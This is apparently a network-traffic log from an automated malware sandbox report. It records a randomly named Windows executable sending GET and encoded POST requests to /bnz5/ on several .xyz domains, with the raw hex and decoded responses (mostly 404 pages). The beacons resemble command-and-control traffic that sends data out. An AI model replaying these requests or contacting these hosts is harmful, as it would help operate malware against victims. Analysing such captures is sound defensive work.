                                                                                                      Data Ascii: 9d8<!doctype html><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no"><title>Site Not Found</title><style>:root{--colorDefaultTextColor:#A3A9AC;--colorDefaultTextColorCard:#2D3B41;--colorBgApp:rgb(14, 30, 37);--colorBgInverse:hsl(175, 48%, 98%);--colorTextMuted:rgb(100, 110, 115);--colorError:#D32254;--colorBgCard:#fff;--colorShadow:#0e1e251f;--colorErrorText:rgb(142, 11, 48);--colorCardTitleCard:#2D3B41;--colorStackText:#222;--colorCodeText:#F5F5F5}body{font-family:-apple-system,BlinkMacSystemFont,segoe ui,Roboto,Helvetica,Arial,sans-serif,apple color emoji,segoe ui emoji,segoe ui symbol;background:#34383c;color:#fff;overflow:hidden;margin:0;padding:0;font-size:1rem;line-height:1.5}h1{margin:0;font-size:1.375rem;line-height:1.2}.main{position:relative;display:flex;flex-direction:column;align-items:center;justify-content:center;height:100vh;width:100vw}.card{position:relative;display:flex;flex-direction:column;width:75%;max-width:500px;padding:24px;
                                                                                                      Apr 16, 2024 12:00:56.665348053 CEST1228INData Raw: 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 30 65 31 65 32 35 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 38 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 31 34 2c 33 30 2c 33 37
                                                                                                      Data Ascii: background:#fff;color:#0e1e25;border-radius:8px;box-shadow:0 2px 4px rgba(14,30,37,.16)}a{margin:0;font-weight:600;line-height:24px;color:#054861}a svg{position:relative;top:2px}a:hover,a:focus{text-decoration:none}a:hover svg path{fill:#00706
                                                                                                      Apr 16, 2024 12:00:56.665383101 CEST563INData Raw: 2d 64 65 70 6c 6f 79 65 64 2d 6d 79 2d 73 69 74 65 2d 62 75 74 2d 69 2d 73 74 69 6c 6c 2d 73 65 65 2d 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 2f 31 32 35 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 34 30 34 70 61 67 65 26 75 74 6d 5f 63 61 6d 70 61 69
                                                                                                      Data Ascii: -deployed-my-site-but-i-still-see-page-not-found/125?utm_source=404page&utm_campaign=community_tracking">"page not found" support guide</a>for troubleshooting tips.<p style=color:var(--colorTextMuted)>Netlify Internal ID:<span class="inline-


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      24192.168.2.54974375.2.60.5802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:00:59.169714928 CEST453OUTGET /bnz5/?kFGTX=Q6OxIXo8tXD&gr=90cL6Q+hnzVn1nW1iqhU1H7cWV3fvz6SaIERCijRkAMfp+TQya0GlzYPpQzULEJqUDrLh9Kv8LQV8OdLSWJ6ERPfs+zhKb8B6PZEz280PNZ5UlofhaQwyuwHrpNW2TXV5g== HTTP/1.1
                                                                                                      Host: www.book-of-degen.xyz
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Apr 16, 2024 12:00:59.290175915 CEST1289INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html
                                                                                                      Date: Tue, 16 Apr 2024 10:00:59 GMT
                                                                                                      Server: Netlify
                                                                                                      X-Nf-Request-Id: 01HVK5MH2VHJ14N108E9M8MFJM
                                                                                                      Connection: close
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Data Raw: 39 64 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 3c 74 69 74 6c 65 3e 53 69 74 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 7b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 3a 23 41 33 41 39 41 43 3b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 43 61 72 64 3a 23 32 44 33 42 34 31 3b 2d 2d 63 6f 6c 6f 72 42 67 41 70 70 3a 72 67 62 28 31 34 2c 20 33 30 2c 20 33 37 29 3b 2d 2d 63 6f 6c 6f 72 42 67 49 6e 76 65 72 73 65 3a 68 73 6c 28 31 37 35 2c 20 34 38 25 2c 20 39 38 25 29 3b 2d 2d 63 6f 6c 6f 72 54 65 78 74 4d 75 74 65 64 3a 72 67 62 28 31 30 30 2c 20 31 31 30 2c 20 31 31 35 29 3b 2d 2d 63 6f 6c 6f 72 45 72 72 6f 72 3a 23 44 33 32 32 35 34 3b 2d 2d 63 6f 6c 6f 72 42 67 43 61 72 64 3a 23 66 66 66 3b 2d 2d 63 6f 6c 6f 72 53 68 61 64 6f 77 3a 23 30 65 31 65 32 35 31 66 3b 2d 2d 63 6f 6c 6f 72 45 72 72 6f 72 54 65 78 74 3a 72 67 62 28 31 34 32 2c 20 31 31 2c 20 34 38 29 3b 2d 2d 63 6f 6c 6f 72 43 61 72 64 54 69 74 6c 65 43 61 72 64 3a 23 32 44 33 42 34 31 3b 2d 2d 63 6f 6c 6f 72 53 74 61 63 6b 54 65 78 74 3a 23 32 32 32 3b 2d 2d 63 6f 6c 6f 72 43 6f 64 65 54 65 78 74 3a 23 46 35 46 35 46 35 7d 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 73 65 67 6f 65 20 75 69 2c 52 6f 62 6f 74 6f 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 2c 61 70 70 6c 65 20 63 6f 6c 6f 72 20 65 6d 6f 6a 69 2c 73 65 67 6f 65 20 75 69 20 65 6d 6f 6a 69 2c 73 65 67 6f 65 20 75 69 20 73 79 6d 62 6f 6c 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 34 33 38 33 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 7d 68 31 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 2e 6d 61 69 6e 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 77 69 64 74 68 3a 31 30 30 76 77 7d 2e 63 61 72 64 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 77 69 64 74 68 3a 37 35 25 3b 6d 61 78 2d 77 69 64 74 68 3a 35 30 30 70 78 3b 70 61 64 64 69 6e 67 3a 32 34 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 30 65 31 65 32 35 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 38 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20
                                                                                                      Data Ascii: 9d8<!doctype html><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no"><title>Site Not Found</title><style>:root{--colorDefaultTextColor:#A3A9AC;--colorDefaultTextColorCard:#2D3B41;--colorBgApp:rgb(14, 30, 37);--colorBgInverse:hsl(175, 48%, 98%);--colorTextMuted:rgb(100, 110, 115);--colorError:#D32254;--colorBgCard:#fff;--colorShadow:#0e1e251f;--colorErrorText:rgb(142, 11, 48);--colorCardTitleCard:#2D3B41;--colorStackText:#222;--colorCodeText:#F5F5F5}body{font-family:-apple-system,BlinkMacSystemFont,segoe ui,Roboto,Helvetica,Arial,sans-serif,apple color emoji,segoe ui emoji,segoe ui symbol;background:#34383c;color:#fff;overflow:hidden;margin:0;padding:0;font-size:1rem;line-height:1.5}h1{margin:0;font-size:1.375rem;line-height:1.2}.main{position:relative;display:flex;flex-direction:column;align-items:center;justify-content:center;height:100vh;width:100vw}.card{position:relative;display:flex;flex-direction:column;width:75%;max-width:500px;padding:24px;background:#fff;color:#0e1e25;border-radius:8px;box-shadow:0
                                                                                                      Apr 16, 2024 12:00:59.290239096 CEST1289INData Raw: 32 70 78 20 34 70 78 20 72 67 62 61 28 31 34 2c 33 30 2c 33 37 2c 2e 31 36 29 7d 61 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 34 70 78 3b 63 6f 6c 6f 72 3a 23 30 35 34 38
                                                                                                      Data Ascii: 2px 4px rgba(14,30,37,.16)}a{margin:0;font-weight:600;line-height:24px;color:#054861}a svg{position:relative;top:2px}a:hover,a:focus{text-decoration:none}a:hover svg path{fill:#007067}p:last-of-type{margin-bottom:0}.inline-code{display:inline-
                                                                                                      Apr 16, 2024 12:00:59.290275097 CEST441INData Raw: 73 75 70 70 6f 72 74 20 67 75 69 64 65 3c 2f 61 3e 0a 66 6f 72 20 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 20 74 69 70 73 2e 3c 70 20 73 74 79 6c 65 3d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 54 65 78 74 4d 75 74 65 64 29 3e 4e 65
                                                                                                      Data Ascii: support guide</a>for troubleshooting tips.<p style=color:var(--colorTextMuted)>Netlify Internal ID:<span class="inline-code request-id"><code>11b01HVK5MH2VHJ14N108E9M8MFJM</code></span></div></div></div><script>(function(){document.refer


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      25192.168.2.549744203.161.50.128802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:01:04.680532932 CEST724OUTPOST /bnz5/ HTTP/1.1
                                                                                                      Host: www.fusionndustries.xyz
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 203
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.fusionndustries.xyz
                                                                                                      Referer: http://www.fusionndustries.xyz/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Raw: 67 72 3d 38 4c 73 4a 73 54 77 41 57 68 67 48 31 66 56 6f 58 76 77 68 63 6c 69 49 34 69 55 39 39 55 37 57 47 45 30 41 33 65 36 31 63 42 6a 37 53 33 57 65 64 2f 32 51 4a 77 4e 36 6b 4d 45 76 62 4d 32 4f 32 32 76 4c 6d 36 4d 66 35 46 42 31 61 55 30 65 4f 64 71 33 65 62 39 43 71 68 55 41 2b 43 53 54 4a 35 67 38 62 76 75 59 36 38 39 42 41 4b 6b 39 45 52 71 53 59 53 36 39 4e 66 38 48 73 4e 45 71 63 54 7a 56 43 65 44 72 53 79 48 30 64 38 78 30 51 64 62 62 34 47 7a 50 45 52 6f 2b 71 46 4f 6c 6d 68 44 57 77 6d 67 6e 4a 71 6a 74 72 67 56 4b 4f 30 34 71 50 2f 4c 58 61 41 63 59 58 30 70 61 57 72 76 5a 68 58 77 3d
                                                                                                      Data Ascii: gr=8LsJsTwAWhgH1fVoXvwhcliI4iU99U7WGE0A3e61cBj7S3Wed/2QJwN6kMEvbM2O22vLm6Mf5FB1aU0eOdq3eb9CqhUA+CSTJ5g8bvuY689BAKk9ERqSYS69Nf8HsNEqcTzVCeDrSyH0d8x0Qdbb4GzPERo+qFOlmhDWwmgnJqjtrgVKO04qP/LXaAcYX0paWrvZhXw=
                                                                                                      Apr 16, 2024 12:01:04.847704887 CEST1289INHTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 16 Apr 2024 10:01:04 GMT
                                                                                                      Server: Apache
                                                                                                      Content-Length: 11834
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 47 69 74 61 6c 20 2d 20 44 69 67 69 74 61 6c 20 41 67 65 6e 63 79 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 57 65 62 20 46 6f 6e 74 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 48 65 65 62 6f 3a 77 67 68 74 40 34 30 30 3b 35 30 30 26 66 61 6d 69 6c 79 3d 4a 6f 73 74 3a 77 67 68 74 40 35 30 30 3b 36 30 30 3b 37 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 20 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 49 63 6f 6e 20 46 6f 6e 74 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 40 31 2e 34 2e 31 2f 66 6f 6e 74 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 4c 69 62 72 61 72 69 65 73 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 6c 69 62 2f 61 6e 69 6d 61 74 65 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 6c 69 62 2f 6f 77 6c 63 61 72 6f 75 73 65 6c 2f 61 73 73 65 74 73 2f 6f 77 6c 2e 63 61 72 6f 75 73 65 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 6c 69 62 2f 6c 69 67 68 74 62 6f 78 2f 63 73 73 2f
                                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>DGital - Digital Agency HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500&family=Jost:wght@500;600;700&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" rel="stylesheet"> <link href="lib/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet"> <link href="lib/lightbox/css/
                                                                                                      Apr 16, 2024 12:01:04.847744942 CEST1289INData Raw: 6c 69 67 68 74 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 43 75 73 74 6f 6d 69 7a 65 64 20 42 6f 6f 74 73 74 72 61 70 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d
                                                                                                      Data Ascii: lightbox.min.css" rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet --> <link href="css/style.css" rel="stylesheet"></head><bo
                                                                                                      Apr 16, 2024 12:01:04.847784996 CEST1289INData Raw: 74 74 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 6c 61 70 73 65 20 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 22 20 69 64 3d 22 6e 61 76 62 61 72 43 6f 6c 6c 61 70 73 65 22 3e 0d
                                                                                                      Data Ascii: tton> <div class="collapse navbar-collapse" id="navbarCollapse"> <div class="navbar-nav mx-auto py-0"> <a href="index.html" class="nav-item nav-link">Home</a>
                                                                                                      Apr 16, 2024 12:01:04.847825050 CEST1289INData Raw: 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6e 61 76 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 2d 78 78 6c 20 70 79 2d 35 20 62 67
                                                                                                      Data Ascii: </div> </nav> <div class="container-xxl py-5 bg-primary hero-header"> <div class="container my-5 py-5 px-lg-5"> <div class="row g-5 py-5"> <div c
                                                                                                      Apr 16, 2024 12:01:04.847989082 CEST1289INData Raw: 20 70 78 2d 6c 67 2d 35 20 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 22 3e 0d 0a
                                                                                                      Data Ascii: px-lg-5 text-center"> <div class="row justify-content-center"> <div class="col-lg-6"> <i class="bi bi-exclamation-triangle display-1 text-primary"></i> <h
                                                                                                      Apr 16, 2024 12:01:04.848026037 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 65 6e 76 65 6c 6f 70 65 20 6d 65 2d 33 22 3e 3c 2f 69 3e 69 6e 66 6f 40 65 78 61 6d 70 6c 65 2e 63 6f 6d 3c 2f 70 3e 0d 0a 20 20 20
                                                                                                      Data Ascii: <p><i class="fa fa-envelope me-3"></i>info@example.com</p> <div class="d-flex pt-2"> <a class="btn btn-outline-light btn-social" href=""><i class="fab fa-twitter"></i></a
                                                                                                      Apr 16, 2024 12:01:04.848124981 CEST1289INData Raw: 73 73 3d 22 73 65 63 74 69 6f 6e 2d 74 69 74 6c 65 20 74 65 78 74 2d 77 68 69 74 65 20 68 35 20 6d 62 2d 34 22 3e 47 61 6c 6c 65 72 79 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                      Data Ascii: ss="section-title text-white h5 mb-4">Gallery<span></span></p> <div class="row g-2"> <div class="col-4"> <img class="img-fluid" src="img/portfolio-1.jpg" al
                                                                                                      Apr 16, 2024 12:01:04.848161936 CEST1289INData Raw: 2d 36 20 63 6f 6c 2d 6c 67 2d 33 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 73 65 63 74 69 6f 6e 2d 74 69 74 6c 65 20 74 65 78 74 2d 77 68 69 74 65 20 68 35 20 6d 62 2d 34 22
                                                                                                      Data Ascii: -6 col-lg-3"> <p class="section-title text-white h5 mb-4">Newsletter<span></span></p> <p>Lorem ipsum dolor sit amet elit. Phasellus nec pretium mi. Curabitur facilisis ornare velit non vulpu</p
                                                                                                      Apr 16, 2024 12:01:04.848339081 CEST1289INData Raw: 69 6e 6b 2f 62 61 63 6b 6c 69 6e 6b 2c 20 79 6f 75 20 63 61 6e 20 70 75 72 63 68 61 73 65 20 74 68 65 20 43 72 65 64 69 74 20 52 65 6d 6f 76 61 6c 20 4c 69 63 65 6e 73 65 20 66 72 6f 6d 20 22 68 74 74 70 73 3a 2f 2f 68 74 6d 6c 63 6f 64 65 78 2e
                                                                                                      Data Ascii: ink/backlink, you can purchase the Credit Removal License from "https://htmlcodex.com/credit-removal". Thank you for your support. ***/-->Designed By <a class="border-bottom" href="https://htmlcodex.com">HTML Codex</a>
                                                                                                      Apr 16, 2024 12:01:04.848373890 CEST379INData Raw: 61 79 70 6f 69 6e 74 73 2f 77 61 79 70 6f 69 6e 74 73 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6c 69 62 2f 63 6f 75 6e 74 65 72 75 70 2f 63 6f 75 6e 74 65 72 75 70 2e 6d 69 6e
                                                                                                      Data Ascii: aypoints/waypoints.min.js"></script> <script src="lib/counterup/counterup.min.js"></script> <script src="lib/owlcarousel/owl.carousel.min.js"></script> <script src="lib/isotope/isotope.pkgd.min.js"></script> <script src="li


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      26192.168.2.549745203.161.50.128802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:01:07.362704992 CEST744OUTPOST /bnz5/ HTTP/1.1
                                                                                                      Host: www.fusionndustries.xyz
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 223
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.fusionndustries.xyz
                                                                                                      Referer: http://www.fusionndustries.xyz/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Raw: 67 72 3d 38 4c 73 4a 73 54 77 41 57 68 67 48 33 2f 6c 6f 62 73 59 68 55 6c 69 4a 6b 79 55 39 7a 30 36 2b 47 45 34 41 33 66 50 71 63 7a 48 37 53 53 79 65 63 2b 32 51 49 77 4e 36 71 73 45 6d 47 38 33 6a 32 32 6a 44 6d 37 77 66 35 46 39 31 61 52 49 65 4f 4b 57 34 4d 37 39 41 2f 52 56 47 7a 69 53 54 4a 35 67 38 62 72 44 39 36 38 6c 42 41 36 55 39 4c 55 4c 45 65 69 36 2b 4b 66 38 48 6f 4e 45 55 63 54 7a 72 43 63 33 56 53 77 50 30 64 2b 70 30 51 4d 62 59 79 47 7a 56 5a 42 70 52 69 68 58 50 6d 79 33 6d 35 6d 56 4f 64 4a 43 56 6a 32 34 67 55 57 77 43 63 66 6e 76 4b 54 55 76 47 45 49 7a 4d 49 2f 70 2f 41 6d 63 6e 31 6a 42 66 61 52 34 48 79 2f 37 69 41 30 47 5a 4a 53 7a
                                                                                                      Data Ascii: gr=8LsJsTwAWhgH3/lobsYhUliJkyU9z06+GE4A3fPqczH7SSyec+2QIwN6qsEmG83j22jDm7wf5F91aRIeOKW4M79A/RVGziSTJ5g8brD968lBA6U9LULEei6+Kf8HoNEUcTzrCc3VSwP0d+p0QMbYyGzVZBpRihXPmy3m5mVOdJCVj24gUWwCcfnvKTUvGEIzMI/p/Amcn1jBfaR4Hy/7iA0GZJSz
                                                                                                      Apr 16, 2024 12:01:07.532691002 CEST1289INHTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 16 Apr 2024 10:01:07 GMT
                                                                                                      Server: Apache
                                                                                                      Content-Length: 11834
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html
